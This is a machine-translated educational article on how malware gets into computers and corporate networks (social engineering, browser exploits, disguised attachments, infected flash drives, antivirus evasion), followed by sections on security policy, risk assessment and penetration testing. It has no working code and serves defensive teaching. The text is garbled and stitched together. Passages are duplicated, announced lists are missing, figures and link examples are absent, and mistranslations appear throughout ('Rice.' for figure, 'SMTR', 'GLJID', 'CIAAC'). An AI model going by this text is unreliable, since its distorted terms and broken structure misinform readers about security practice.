Penetration methods malware into the system
A necessary task for virus writers and cybercriminals is to inject a virus, worm or Trojan horse into a victim computer or mobile phone. This goal is achieved in various ways, which fall into two main categories:
social engineering (the term "social engineering" is also used - tracing paper from the English "social engineering");
techniques for injecting malicious code into an infected system without the user's knowledge.
Often these methods are used simultaneously. At the same time, special measures are often used to counteract anti-virus programs.
social engineering
Social engineering methods in one way or another force the user to run an infected file or open a link to an infected website. These methods are used not only by numerous mail worms, but also by other types of malicious software.
The task of hackers and virus writers is to draw the user's attention to an infected file (or an HTTP link to an infected file), to interest the user, to force him to click on the file (or on the link to the file). The “classic of the genre” is the LoveLetter mail worm, which made a splash in May 2000, and still holds the lead in terms of financial damage, according to data from Computer Economics. The message that the worm displayed on the screen looked like this:
A lot of people reacted to the recognition of "I LOVE YOU", and as a result mail servers large companies could not withstand the load - the worm sent copies of itself to all contacts from the address book each time an attached VBS file was opened.
The Mydoom mail worm, which blew up on the Internet in January 2004, used texts that imitated the technical messages of a mail server.
Also worth mentioning is the Swen worm, which posed as a message from Microsoft and disguised itself as a patch that fixes a number of new vulnerabilities in Windows (it is not surprising that many users succumbed to the call to install "another patch from Microsoft").
Incidents also occur, one of which occurred in November 2005. In one version of the Sober worm, it was reported that the German criminal police were investigating cases of visiting illegal websites. This letter got to the lover of child pornography, who mistook it for an official letter - and obediently surrendered to the authorities.
Recently, not the files attached to the email, but links to files located on the infected site have gained particular popularity. A message is sent to a potential victim - by mail, via ICQ or another pager, less often - via IRC Internet chats (in the case of mobile viruses the usual delivery method is SMS). The message contains some attractive text that compels an unsuspecting user to click on the link. This method penetration into victim computers is by far the most popular and effective, as it allows you to bypass vigilant anti-virus filters on mail servers.
The possibilities of file-sharing networks (P2P networks) are also used. A worm or Trojan is posted on the P2P network under a variety of "delicious" names, for example:
AIM & AOL Password Hacker.exe
Microsoft CD Key Generator.exe
play station emulator crack.exe
In search of new programs, P2P users stumble upon these names, download the files, and run them for execution.
“Wiring” is also quite popular, when a free utility or instructions for hacking various payment systems are slipped to the victim. For example, they offer to get free access to the Internet or a mobile operator, download a credit card number generator, increase the amount of money in a personal Internet wallet, etc. Naturally, victims of such fraud are unlikely to apply to law enforcement agencies (after all, in fact, they themselves tried to earn money by fraudulent means), and Internet criminals take full advantage of this.
An unusual method of "wiring" was used by an unknown attacker from Russia in 2005-2006. Trojan was sent to addresses found on the job.ru website, which specializes in employment and personnel search. Some of those who posted their resumes there allegedly received a job offer with a file attached to the letter, which was offered to open and familiarize themselves with its contents. The file was, of course, a Trojan. It is also interesting that the attack was carried out mainly on corporate email addresses. The calculation, apparently, was based on the fact that company employees are unlikely to report the source of infection. And so it happened - for more than six months, Kaspersky Lab specialists could not obtain intelligible information about the method of penetration of the Trojan program into users' computers.
There are also quite exotic cases, for example, a letter with an attached document, in which a bank client is asked to confirm (or rather, to inform) their access codes - print the document, fill out the attached form and then fax it to the phone number indicated in the letter.
Another unusual case of home delivery of spyware occurred in Japan in the fall of 2005. Some attackers sent CDs infected with a Trojan spyware to home addresses (city, street, home) of customers of a Japanese bank. At the same time, information was used from the previously stolen client base of this very bank.
Implementation technologies
These technologies are used by attackers to inject malicious code into a system without drawing the attention of the computer owner. This is done through vulnerabilities in the security system of operating systems and software. The presence of vulnerabilities allows a network worm or a Trojan created by an attacker to penetrate a victim computer and launch itself for execution on its own.
Vulnerabilities are, in fact, errors in the code or in the logic of the work of various programs. Modern operating systems and applications have a complex structure and extensive functionality, and it is simply impossible to avoid mistakes in their design and development. This is what virus writers and cybercriminals use.
Vulnerabilities in Outlook email clients were exploited by the Nimda and Aliz email worms. In order to launch the worm's file, it was enough to open an infected letter or simply hover over it in the preview window.
Malicious programs also actively exploited vulnerabilities in network components of operating systems. CodeRed, Sasser, Slammer, Lovesan (Blaster) and many other worms running under Windows OS used these vulnerabilities to spread. Linux systems were also affected - the Ramen and Slapper worms penetrated computers through vulnerabilities in this operating environment and applications for it.
In recent years, one of the most popular methods of infection has been the introduction of malicious code through web pages. This often exploits vulnerabilities in Internet browsers. An infected file and a script program that exploits a vulnerability in a browser are placed on a web page. When a user enters an infected page, a script program is triggered, which, through the vulnerability, downloads the infected file to the computer and launches it there for execution. As a result, in order to infect a large number of computers, it is enough to lure as many users as possible to such a web page. This is achieved in various ways, for example, by sending spam with the address of the page, by sending similar messages through Internet pagers, sometimes even search engines are used for this. The infected page contains a variety of text, which sooner or later is calculated by search engines - and a link to this page appears in the list of other pages in the search results.
A separate class are Trojans that are designed to download and run other Trojans. Usually, these Trojans, which are very small in size, in one way or another (for example, using another vulnerability in the system) "slip" onto the victim computer, and then independently download other malicious components from the Internet and install other malicious components into the system. Often such Trojans change browser settings to the most insecure ones in order to “make the road easier” for other Trojans.
Vulnerabilities that become known are quickly fixed by developer companies, but information about new vulnerabilities constantly appears, which immediately begin to be used by numerous hackers and virus writers. Many Trojan bots use new vulnerabilities to increase their numbers, and new bugs in Microsoft office they immediately begin to be used to introduce regular Trojan programs into computers. At the same time, unfortunately, there is a tendency to reduce the time interval between the appearance of information about the next vulnerability and the start of its use by worms and Trojans. As a result, vulnerable software companies and developers antivirus programs find themselves in a time pressure situation. The former need to fix the error as quickly as possible, test the result (usually called a “patch”, “patch”) and send it to users, and the latter should immediately release a tool for detecting and blocking objects (files, network packets) exploiting the vulnerability.
Simultaneous use of implementation technologies and social engineering methods
Quite often, computer intruders use both methods at once. Social engineering method - to attract the attention of a potential victim, and technical - to increase the likelihood of an infected object penetrating the system.
For example, the Mimail mail worm was distributed as an attachment to email. In order for the user to pay attention to the message, specially formatted text was inserted into it, and to launch a copy of the worm from the ZIP archive attached to the message, a vulnerability in Internet browser explorer. As a result, when opening a file from an archive, the worm created a copy of itself on the disk and launched it for execution without any system warnings or additional user actions. By the way, this worm was one of the first designed to steal the personal information of users of e-gold Internet wallets.
Another example is spamming with the subject "Hello" and the text "Look what they write about you." The text was followed by a link to a web page. During the analysis, it turned out that this web page contains a script program that, using another vulnerability in Internet Explorer, downloads the LdPinch Trojan program to the user's computer, designed to steal various passwords.
Counteraction to antivirus programs
Since the goal of cybercriminals is to inject malicious code into victim computers, for this they need not only to force the user to run an infected file or penetrate the system through some kind of vulnerability, but also to sneak past the installed anti-virus filter unnoticed. Therefore, it is not surprising that attackers purposefully fight against anti-virus programs. The techniques used by them are very diverse, but the most common are the following:
Packaging and code encryption. A significant proportion (if not most) of modern computer worms and Trojans are packaged or encrypted in one way or another. Moreover, specially designed packaging and encryption utilities are created by the computer underground. For example, absolutely all files found on the Internet processed by the utilities CryptExe, Exeref, PolyCrypt and some others turned out to be malicious.
To detect such worms and Trojans, anti-virus programs either have to add new decompression and decryption methods, or add signatures to each malware sample, which reduces the quality of detection, since not all possible samples of the modified code end up in the hands of the anti-virus company.
code mutation. Dilution of the Trojan code with "garbage" instructions. As a result, the functionality of the Trojan program is preserved, but its “appearance” changes significantly. Periodically, there are cases when code mutation occurs in real time - every time a Trojan is downloaded from an infected website. Those. all or a significant part of the Trojan samples that end up on computers from such a site are different. An example of the application of this technology is the Warezov mail worm, several versions of which caused significant epidemics in the second half of 2006.
Hiding your presence. The so-called "rootkit technologies" (from the English "rootkit"), commonly used in Trojans. System functions are intercepted and replaced, thanks to which the infected file is not visible either by regular means of the operating system or by anti-virus programs. Sometimes the branches of the registry where a copy of the Trojan is registered and other system areas of the computer are also hidden. These technologies are actively used, for example, by the backdoor Trojan HacDef.
Stopping the anti-virus and the system for receiving anti-virus database updates (updates). Many Trojans and network worms take special actions against anti-virus programs - they look for them in the list of active applications and try to stop their work, corrupt anti-virus databases, block updates, etc. Anti-virus programs have to protect themselves in adequate ways - monitor the integrity of databases, hide their processes from Trojans, etc.
Hiding your code on websites. The addresses of web pages containing Trojan files sooner or later become known to anti-virus companies. Naturally, such pages come under the close attention of anti-virus analysts - the contents of the page are periodically downloaded, new versions of Trojans are included in anti-virus updates. To counteract this, the web page is modified in a special way - if the request comes from the address of an anti-virus company, then some non-Trojan file is downloaded instead of a Trojan one.
Attack by quantity. Generation and distribution on the Internet of a large number of new versions of Trojans in a short period of time. As a result, anti-virus companies find themselves inundated with new samples that take time to analyze, which gives malicious code an additional chance to successfully infiltrate computers.
These and other methods are used by the computer underground to counteract anti-virus programs. At the same time, the activity of cybercriminals is growing year after year, and now we can talk about a real "technology race" that has unfolded between the anti-virus industry and the virus industry. At the same time, the number of individual hackers and criminal groups is growing, as well as their professionalism. All this together greatly increases the complexity and amount of work required by antivirus companies to develop sufficient protection tools.
Email remains one of the main sources of malware infiltration into corporate networks. There are several main uses for email as a means of carrying malware:
distribution of malware "in its pure form" - in this case, malware is an attachment to the letter and its automatic launch is not provided. The launch of the malicious program is carried out by the user himself, for which elements of social engineering are often used in the letter. Attached malware is not necessarily an executable file - there are often malicious scripts, such as Worm.Win32.Feebs, which are sent by mail as HTA files containing an encrypted script that downloads an executable file from the Internet;
a malicious program with a modified extension - this method differs from the previous one in that the executable file attached to the letter has a double extension, for example Document.doc .pif. IN this case spaces are used to mask the real file extension and their number can vary from 10-15 to hundreds. A more original method of masking is to use the *.com extension - as a result, the attached file may be mistakenly considered by the user as a link to the site, for example www.playboy.com, the user will most likely consider it a link to the site, and not an attached file with the name www.playboy and extension *.com;
malware in the archive - archiving is an additional layer of protection against anti-virus scanners, and the archive can be deliberately damaged (but not so much that it cannot be extracted from it malicious file) or encrypted with a password. If the archive is protected with a password, the latter is placed in the body of the message in the form of text or an image - a similar technique, for example, was used in the Bagle mail worm. The launch of a malicious program in this case is possible solely due to the curiosity of the user, who needs to manually enter the password and then run the extracted file;
a letter in html format with an exploit to launch an embedded malicious program - at present, such mail viruses are rare, but in 2001-2003 they were widespread (typical examples are Email-Worm.Win32.Avron, Email-Worm.Win32. BadtransII, Net-Worm.Win32.Nimda);
Letters with a link to a malicious object have recently become widespread, so this method deserves more detailed consideration. It is based on the fact that there is no malicious code in the letter, and therefore, the mail antivirus cannot detect it and block the forwarding of the letter. The text of the letter is prepared using social engineering methods and is aimed at persuading the user to open the link in the body of the letter. Typical examples are disguise as a greeting card (Fig. 1).
Rice. 1. "Greeting card"
The figure shows a very crude fake: it is clearly seen that the letter came from some incomprehensible address, and the link with the IP address instead of the site name does not inspire confidence. Nevertheless, according to the author's statistics, thousands of users "catch" on such letters. A better version of the fake greeting card message is shown in Fig. 2.
Rice. 2. Higher quality fake postcard
In this case, it is much more difficult to recognize a fake: visually, the letter really came from the postcard.ru service and the link to the postcard page leads to this site. In this case, the deception is based on the fact that the letter is in html format and the link is made with a standard tag . As you know, the design of a link using this tag looks like this:
The text description can be arbitrary, as it has nothing to do with the opened URL. Therefore, in this letter, the text description of the link is www.postcard.ru/card.php?4295358104, while the real link points to a completely different resource. This technique is elementary implemented and easily misleads the user.
the link leads directly to the malware executable - this is the simplest case. When opening this link, the user will be prompted what to do with the file under this link: save or run. Selecting "run" leads to the launch of malicious code and the defeat of the PC. Practice shows that users usually do not think about the danger. The most recent example is the malicious program Virus.VBS.Agent.c, which destroys files on a disk (in fact, because of this it is classified as a Virus) and spreads itself by sending "greeting cards" by e-mail with a link to its executable. a file hosted directly on the website of the virus developer. A large number of victims of this virus users - a clear example of the effectiveness of this method;
a link to a site disguised as a site of a legitimate program. A typical example is programs for "hacking" cellular providers and mailboxes, which often have a home page, believable documentation, and an installation package;
the link leads to the html page with the exploit. This is a common option (at the time of writing the article, the author recorded a real epidemic of such letters), and it is more dangerous than a direct link to an executable file, since such a link is very difficult to detect and block by proxy protocols. If successful, the exploit downloads malicious code, and as a result, more than ten malicious programs can be installed on the affected computer. The usual set: mail worms, a password-stealing Trojan, a set of Trojans of the Trojan-Spy and Trojan-Proxy class.
Protective measures against distributed software e-mail malware is fairly obvious. At a minimum, you need to install an antivirus on the mail server (or, when choosing a hosting provider, pay attention to the antivirus protection mail). In addition, a number of other activities should be carried out:
explain to users why it is dangerous to open programs attached to emails and links contained in them. It is very useful to teach users to identify the real URL of the links;
if it is technically possible to block sending and receiving emails with attached executable files and encrypted archives. In Smolenskenergo, for example, such blocking has been in place for a long time and has shown its high efficiency (at the same time, blocked messages are quarantined and can be retrieved by the administrator);
set filters to block emails by content and keep them up to date. Such filters are effective against emails containing links to malware - they are usually easy to filter by keywords Animated card or postcard type. A side effect is the blocking of real greeting cards and similar letters, a compromise solution is the installation of such a filter in anti-spam systems and marking letters as spam.
Internet
In terms of the number of investigated incidents, the Internet is also one of the main sources of malware penetration into the network. There are several main methods widely used by attackers:
all kinds of cracks and generators serial numbers- statistics show that during the search for a key or crack on hacker sites, the probability of a computer being infected with malware is very high. Moreover, such a program can be downloaded in an archive with crack or obtained while working with the site as a result of exploits and malicious scripts on hacker sites. Countermeasures - blocking access to hacker sites at the proxy server level and prohibition of their visits at the level of security policy and other governing documents of the company;
hacked legitimate sites - according to statistics, lately hacking sites have become more frequent and are being carried out according to typical schemes. Injected into the html code of the pages of the infected site small code- usually an IFRAME tag leading to a page with an exploit or an encrypted script that in one way or another redirects the user to an infected site (it is possible to dynamically insert an IFRAME tag into the page body, redirect to an exploit page, etc.). The main danger lies in the fact that site hacking is impossible to predict and, accordingly, it is very difficult to protect the user from it (Fig. 3).
Rice. 3. Exploit code added to the end of the HTML page
hacked site
As you can see in the figure, the exploit code is added to the end of the html page by automatic means and is an encrypted script. Script encryption is a measure of protection from research, but its main purpose is protection from signature detection. In more complex cases, hacky inserts can be placed in the page code, making them difficult to detect.
Protection against exploits in web pages comes down to the prompt installation of operating system and browser updates. In addition, running the browser with the lowest possible privileges gives good results, which can significantly reduce the damage in case of an exploit.
Flash media
Media of this type are currently very widely used - these are flash drives and flash cards, HDD drives with a USB interface, cell phones, cameras, voice recorders. The proliferation of these devices leads to an increase in the number of malicious programs using these media as a means of transfer. There are three basic ways to infect a flash drive:
creating an autorun.inf file in the root of the disk to launch the malicious program and placing it anywhere on the disk (not necessarily in the root of the disk). The operation of autorun.inf on a flash drive is identical to the operation of a similar file on a CD-ROM, respectively, when you connect or open the drive in Explorer, a malicious program is launched;
creation in the root of the disk or in folders existing on the disk of files that resemble files or folders with their names and icons. The author made an experiment: a harmless executable file with an icon visually indistinguishable from the folder icon and with the name MP3 was placed on the flash drives of the users participating in the experiment. Experience has shown that users immediately showed interest in the new folder and decided to view its contents by double-clicking on the "folder", which led to the launch of the executable file;
using the "companion virus" principle. In essence, this method is identical to the previous one, but in this case, the malicious program creates many copies of itself, and their names match the names of files or folders on the flash drive.
The techniques for protecting against the spread of malware on flash media are quite simple:
install anti-virus protection on users' computers with a monitor that checks files in real time;
an effective measure of protection is to disable autorun;
On strategic PCs, it is a good security measure to block the use of flash media. Blocking can be carried out mechanically (by disabling USB ports and sealing them) and logically using special software;
writing local policies security, blocking the launch of applications from a flash drive.
Notebooks and PDAs
Mobile computers are another vector for malware. A typical situation is the use of a laptop on a business trip, when it is usually connected to someone else's network. In the course of work, a laptop may become infected, most often with a network worm. When an infected laptop connects to its "native" network, PCs located on it can be infected. It is difficult to protect yourself from this, a set of security measures can be reduced to the following:
installation of an antivirus and a firewall on a laptop with mandatory periodic monitoring of their performance by the administrator;
checking the laptop before connecting it to the network, although this operation is not always technically possible, it takes a lot of time and reduces the user's mobility;
creating a special "guest" subnet for laptops and taking measures to protect the main LAN from this subnet.
Protecting a corporate network from malware is a complex task due to the fact that malware is constantly modified and improved to bypass existing systems protection. This article will focus on the main ways in which malicious software (malware) penetrates the network and the corresponding protection methods. When considering protection methods, it is assumed that the network is protected by a firewall and access to network computers from the outside is blocked.
Email remains one of the main sources of malware infiltration into corporate networks. There are several main uses for email as a means of carrying malware:
Letters with a link to a malicious object have recently become widespread, so this method deserves more detailed consideration. It is based on the fact that there is no malicious code in the letter, and therefore, the mail antivirus cannot detect it and block the forwarding of the letter. The text of the letter is prepared using social engineering methods and is aimed at persuading the user to open the link in the body of the letter. Typical examples are disguise as a greeting card (Fig. 1).
Rice. 1. "Greeting card"
The figure shows a very crude fake: it is clearly seen that the letter came from some incomprehensible address, and the link with the IP address instead of the site name does not inspire confidence. Nevertheless, according to the author's statistics, thousands of users "catch" on such letters. A better version of the fake greeting card message is shown in Fig. 2.
Rice. 2. Higher quality fake postcard
In this case, it is much more difficult to recognize a fake: visually, the letter really came from the postcard.ru service and the link to the postcard page leads to this site. In this case, the deception is based on the fact that the letter is in html format and the link is made with a standard tag . As you know, the design of a link using this tag looks like this:
The text description can be arbitrary, as it has nothing to do with the opened URL. Therefore, in this letter, the text description of the link is www.postcard.ru/card.php?4295358104, while the real link points to a completely different resource. This technique is elementary implemented and easily misleads the user.
Measures to protect against malicious programs distributed by e-mail are quite obvious. At a minimum, you need to install an antivirus on the mail server (or, when choosing a hosting provider, pay attention to the anti-virus mail protection it offers). In addition, a number of other activities should be carried out:
In terms of the number of investigated incidents, the Internet is also one of the main sources of malware penetration into the network. There are several main methods widely used by attackers:
Rice. 3. Exploit code added to the end of the HTML page
hacked site
As you can see in the figure, the exploit code is added to the end of the html page by automatic means and is an encrypted script. Script encryption is a measure of protection from research, but its main purpose is protection from signature detection. In more complex cases, hacky inserts can be placed in the page code, making them difficult to detect.
Protection against exploits in web pages comes down to the prompt installation of operating system and browser updates. In addition, running the browser with the lowest possible privileges gives good results, which can significantly reduce the damage in case of an exploit.
This type of media is currently very widely used - these are flash drives and flash cards, HDD drives with a USB interface, Cell Phones, cameras, voice recorders. The proliferation of these devices leads to an increase in the number of malicious programs using these media as a means of transfer. There are three basic ways to infect a flash drive:
The techniques for protecting against the spread of malware on flash media are quite simple:
Mobile computers are another vector for malware. A typical situation is the use of a laptop on a business trip, when it is usually connected to someone else's network. In the course of work, a laptop may become infected, most often with a network worm. When an infected laptop connects to its "native" network, PCs located on it can be infected. It is difficult to protect yourself from this, a set of security measures can be reduced to the following:
In this article, we reviewed the most common ways malware can penetrate a network. From the foregoing, two important conclusions can be drawn:
3. Means of protecting computer networks
Means of protecting computer networks: nomenclature, status, interconnection
According to experts, at least the following aspects should be considered in the protection policy:
- authorization of access to computer systems, identification and authentication of the user;
- access rights control;
- protection monitoring and statistics analysis;
- configuring and testing systems;
- safety training;
- physical security;
- network security.
The first of these points is an outpost, where criteria are formulated that allow only those users who have the right to connect to the system, and everyone else will not even get the opportunity to try to register. The standard tool for implementing this feature is special files or lists of hosts from which remote login is allowed. True, the developers of this device always take care of the temptations for administrators (for some reason there is always a “button” that opens the entrance to everyone). Probably, in some cases, the removal of control has its own explanations - they usually refer to the reliability of other means, the absence of direct inputs, but it is difficult to foresee all the situations that are possible when working with networks. Therefore, you should still configure access authorization without resorting to the default settings.
As practice shows, this type of protection is not able to significantly reduce the likelihood of penetration. Real value its (defining central role) is different - in the registration and accounting of network users trying to log in.
Central role in modern security systems is assigned to the identification and authentication procedures. There are three basic ways to implement them:
- using a password known to the user or a conditional phrase;
- using a personal device/document that only the user owns: a smart card, a pocket authenticator, or simply a specially made identity card (it is assumed that the authenticator will never be shared with anyone);
- through authentication of the user himself - by fingerprints, voice, retinal pattern, etc. These identification methods are being developed within the framework of biometrics.
The most reliable authentication schemes are built as a combination of these methods, and the first one remains the most widespread.symbolic .
Not surprisingly, crackers are well armed with the means to extract logins and passwords. If they manage to copy the password file to their machine, a brute force program is launched, usually using a large dictionary search. Such programs work quickly even on weak computers, and if the security system has no control over how passwords are generated, there is a high probability of guessing at least one. This is followed by an attempt to obtain privileged rights from the disclosed account name - and the job is done.
Particularly dangerous, and not only for themselves, are machines with disabled protection mechanisms or none at all. Administrators have the means to establish trust relationships between hosts using the hosts.equiv, xhost files. With a bad configuration, an intruder can enter an unprotected machine and, without any identification, transitively gain access to all hosts on the corporate network.
The next point of the security policy is access control, which is designed to ensure that after the successful completion of the authentication procedure, only a subset of files and services of the system, defined on a personal basis, becomes available to the user. Thanks to this mechanism, users can read, for example, only their own emails received via e-mail , but not letters from a neighbor. Usually, access rights are set by the users themselves: the owner of the data can allow someone else to work with it, just as a system administrator controls access rights to system and configuration files. It is only important that the owner always bears personal responsibility for his property.
The differentiation of rights is not limited to data only - in parallel, users are allocated subsets of permissible operations. Take at least a system of automated ticket sales. The cashier should of course be able to connect to the central database to request availability and make sales. But his rights should be limited so that he could not change the organization's settlement accounts or increase his salary.
Typically, in multi-user applications, differentiation is carried out through discretionary access control ( Discretionary Access Controls), and in operating systems - file attributes and process identifiers EUID, GLJID. A coherent picture is broken by the SUID and SGID bits, which allow you to programmatically modify the access rights of processes. Setuid scripts, especially setuid root , pose a potential security risk. They either should not be created at all, or they themselves should be reliably protected.
It is impossible to achieve security if you do not maintain order throughout the disorganized infrastructure of the enterprise. Configuration management is a set of technologies that monitor the health of software, hardware, users, and networks. Usually, the configuration of a computer system and its components is clearly defined at the time of commissioning, but over time, control is increasingly lost. Configuration management tools are designed to formalize and detail all the changes that occur in the system.
With good management, first, a strict procedure for making changes, including their documentation, should be thought out and defined. Second, all changes must be evaluated in terms of the overall security policy. While it is possible that this policy will be adjusted, it is important that at every turn of the life cycle, decisions are maintained for everyone to be consistent. even outdated, but remaining systems in the network - otherwise they will turn into that very “weak link”.
All of the above aspects of protection are somehow based on software technologies, but there are extremely important issues that come out of this circle. The corporate network includes the real world: users, physical devices, storage media, etc., which can also cause trouble. Our users, apparently due to historical traditions, are ironic about matters of secrecy. In conditions networking this attitude urgently needs to be changed in order to achieve an awareness of the basic principles of protection. This is the first stage, after which you can move on to the next one - technical training, and not only users, but also professionals should go through it. As security policy specifications are developed, system and database administrators should be familiar with them to the extent that they can be translated into specific software solutions.
A typical loophole for hackers is “weak”, that is, easily cracked passwords. The situation can be corrected by teaching users to consciously treat access control: periodically change passwords, form them correctly. Surprisingly, even in a qualified environment, a common trap is a password formed from a login and a 1 at the end. Although physical security is declining as technology advances, it still forms an important part of overall policy. If an intruder can gain access to the physical components of the network, he can usually log in without authorization. Moreover, the ability of users to physically access critical system components increases the likelihood of unintentional service disruptions. Hence, direct contact with vital computer and network equipment should be limited
the minimum possible circle of personnel - system administrators and engineers. This does not mean any exceptional confidence in them, just in this way the probability of incidents is reduced and, if something does happen, the diagnosis becomes more certain. Referring to my own experience, I can confirm the usefulness of simple organizational measures - do not put valuable equipment in the entrance yard.
Hoping for the best, it's a good idea to foresee the bad options as well. It doesn't hurt to have a contingency plan in case of a power failure or other cataclysms, including malicious intrusion. If a hack does occur, you need to be prepared to react very quickly before the attackers have time to cause severe damage to the system or change administrative passwords.
Network security issues in the overall context of a security policy should cover different kinds access:
Accordingly, two types of mechanisms are used: internal and lying on the perimeter of the enterprise network - where external connections occur.
For internal network security, it is important to ensure the correct configuration of hardware and software by establishing configuration management. External network security involves defining clear network boundaries and installing firewalls at critical locations.
Security risk assessment
The protection policy has been implemented - you can take a break, but it's better not to wait for the arrival of hackers, but to see for yourself how your system is able to withstand external attacks. The goal is to evaluate the achieved degree of security, to identify strong and weak points of protection. The assessment procedure can be carried out on your own, although it may be easier to turn to the services of a company specializing in such activities. Own specialists will have additional difficulties: they will have to ask difficult questions of their colleagues and draw conclusions that someone may not be too pleasant.
Security Policy Evaluation and Testing
The first step is to compare what is planned in the security policy with what is actually happening. To do this, you need to find answers to approximately the following questions.
- Who determines what is confidential?
- Are there procedures for dealing with confidential information?
- Who determines the composition of confidential information communicated to personnel in order to perform work functions?
- Who administers the security system and on what basis?
Obtaining such information is not always easy. The best option is to collect and read published formal documents containing security policy statements, business procedures, architectural diagrams, and so on. However, in the majority of organizations there are no such documents at all, and if they are, they are practically ignored. Then, in order to reveal the real state of affairs, it will be necessary to carry out field observations of workplaces, determining at the same time whether it is possible to notice the manifestations of any single policy at all.
The difference between written rules and typical staff practices can be very large. For example, a published policy might include a provision that passwords should never be
can be used by multiple employees. And, apparently, there are many organizations in which this is sacredly observed, but even more of them suffer just from the separation of passwords.
Some weaknesses in corporate culture can only be discovered through covert intelligence operations. For example, corporate policy may state that passwords are secret and should not be written anywhere, and a cursory walk around the premises will show that they are drawn directly on the keyboard or monitor. Another effective technique is to ask users about the rules for working with information. From such interviews, you can find out what information is most valuable for an employee and how it is presented inside the corporate network and outside.
Studying open sources
Knowledge is power. Following this motto, an attacker can extract a fair amount of a company's virtually private internal information by digging through its open, publicly available materials. The second step in the security assessment is to find out how much an outsider can learn about the company. “Useful” information that gives penetrating power can be: types of operating systems used, patches installed, canonical standards for user logins, internal IP addresses, or names of private hosts and servers.
Steps can (and should) be taken to reduce the amount of information that hackers and crackers can collect, but this requires having an understanding of what has already been leaked and understanding how this leak came about. The most careful attention deserves the study of materials published by employees in Internet . There is a known case when a company presented on its page a source code fragment of a security-critical application. Similar conflicts can be in the materials placed in newspapers, magazines, and other sources.
The results of the study of open materials should become the basis for making adjustments to the rules for preparing open publications.
Host System Security Assessment
Central processing systems (host systems) are usually the best in terms of security. For a simple reason: host systems are more mature, their operating systems and security software are better developed and mastered. Some of the most popular mainframe and midrange security products are decades old.
This, of course, does not mean that your host system is a priori secure. The old host may be the weakest link, for example, if it was created in "prehistoric" times, when no one thought about either local or global. It is necessary to evaluate the security scheme and its implementation on the host system from a new perspective, to determine how well the application software, operating system security mechanisms and the network work together. Since at least two groups of specialists are involved in the organization of calculations - according to operating system and for applications - it is possible that each of them assigns security concerns to colleagues, and the total result may be zero.
Server Security Analysis
Unlike host systems, file, application, and database servers are younger and comparatively less tested - for many of them, the age of the protection apparatus is only a few years. Most of these tools are undergoing constant updates and patching. Often, server administration is carried out by specialists with little experience, so the security of this class of systems usually leaves much to be desired. The situation is aggravated by the fact that, by definition, a completely diverse public has access to the servers via telephone or remote communication lines. Therefore, server security assessment requires increased attention. There are a number of tools available for this, including Kane Analyst (Novell and NT). These types of products inspect servers (using privileged access) and report on configuration, security administration practices, and user populations. It makes sense to use automatic tools - a single scan can reveal problems that are unlikely to be detected even by many hours of manual analysis. For example, a scan can quickly reveal the percentage of users who have excessive access levels or who are members of too many groups.
The next section discusses two more stages - the analysis of the security of network connections.
Simulated controlled penetration
Apparently one of better ways security checks - hire a qualified hacker and ask him to demonstrate his achievements on your network. This type of assessment is called controlled penetration testing.
When preparing such a test, it is not harmful to agree on restrictions on the scope of the attack and on its type - after all we are talking only a check, which must in no case lead to violations of the normal working condition. Based on certain “combat” rules, a choice of test types is then made.
There are two approaches here. In the first, testing is done as if it were done by a real cracker. This approach is called blind penetration. Its distinguishing feature is that the person performing the testing is informed, for example, URL , But inside information- additional access points in Internet , direct connections to the network - not disclosed.
In the second approach - "informed penetration" - the attack team has some knowledge about the structure of the network before the attack. This approach is accepted, it must be checked that certain components must pass. For example, when a firewall is installed on the system, the set of rules used in it must be tested separately.
The set of tests can be divided into two groups: penetration from Internet and penetration then telephone lines.
Internet Connection Scanning
Usually, the main hopes for protection are placed on firewalls between the internal corporate network and the Internet. However, you should be aware that a firewall is only as good as its installation is good - it must be installed in the right place and on a reliable operating system. Otherwise, it will simply be a source of a false sense of security.
To check firewalls and similar systems, scanning and penetration tests are performed that simulate an attack directed at the system being checked from Internet . There are many software tools for testing, for example, two popular ones - ISS Scanner (commercial product) and SATAN (freeware; approx. has not been updated since 1995). You can choose one or another scanner, but the tests will only make sense if three conditions are met: you need to master the correct management of the scanner, the scan results must be carefully analyzed, and the maximum possible part of the infrastructure must be scanned.
The main “targets” of this group of tests are open servers of Internet services ( WWW, SMTR FTP etc.). Getting to these servers themselves is easy - their names are known, admission is free. And then the cracker will try to get to the data of interest. There are several known hacking techniques that you can try to apply directly against the server. Also, based on the server's IP address, a scan can be initiated in an attempt to identify other hosts in the same address range. If something is caught, then a port poll is started on each affected IP address to determine the services running on the host. In many cases, when trying to connect or use a service, information such as the server platform, operating system version, and even the service version (for example, sendmail 8.6).
Armed with this information, an attacker can launch a series of attacks against known host vulnerabilities. Experience has shown that in most situations it is possible, with sufficient intelligence, to gain some level of unauthorized access.
Phone number attack
Over the past decade, modems have revolutionized computer communications. However, these same modems, if installed on networked computers and left in auto-answer mode, represent the most vulnerable points. Phone number attack war dialing ) is a search of all combinations in order to find the modem's sound signal.
running program in automatic mode capable of running through a huge range of telephone numbers overnight, registering detected modems. A hacker over a morning cup of coffee will receive text file with modem addresses and can attack them. What makes this type of attack particularly dangerous is that many companies allow themselves to keep either uncontrolled or unauthorized communication lines that bypass firewalls with Internet and provide direct access to the internal network.
The same attack can be carried out in test mode - the results will show how many modems you can be subjected to a real hack. This type of testing is quite simple. In a blind test, the penetration team finds the company's telephone exchanges (from various open sources, including a Web page), and if the test is not blind, this information is reported to them. Automatically pings a range of telephone numbers in the switches in order to determine the numbers to which the modems are connected. Modem attack methods can rely on terminal programs such as HyperTerminal and remote access control programs such as PC Anyware . Again, the goal is to gain some level of access to the internal network device. If the connection and successful login has occurred, a new game starts.
From all that has been said, one can apparently make the followingconclusion: Network security can be maintained on your own, but it should be a highly professional activity, not a one-time company. An enterprise-wide network is almost always a large system, and all security problems cannot be solved in one fell swoop.
Leaving aside national computer security laws and standards, we can recommend three types of information sources that are most useful and necessary in practice:
relevant sections of the documentation for operating systems and applications in use;
Manufacturers web pages software products and OS on which messages about new versions with bug fixes and patches are published;
there are at least two organizations: CERT (Computer Emergency Response Team) and CIAAC (Computer Incident Advisory Capability), which collect and disseminate information about hacks, give advice on how to eliminate their consequences, report detected software errors, using which attackers penetrate into computer systems.
Just as necessary condition The reliability of protection is systematic, and every system has its own life cycle. For a security system, these are: design - implementation - evaluation - update.
Penetration Testing(jarg. pentest) - a method for assessing the security of computer systems or networks by means of simulating an attack by an intruder. The process includes actively analyzing the system for potential vulnerabilities that could cause the target system to malfunction or cause a complete denial of service. The analysis is conducted from the perspective of a potential attacker and may include active exploitation of system vulnerabilities.
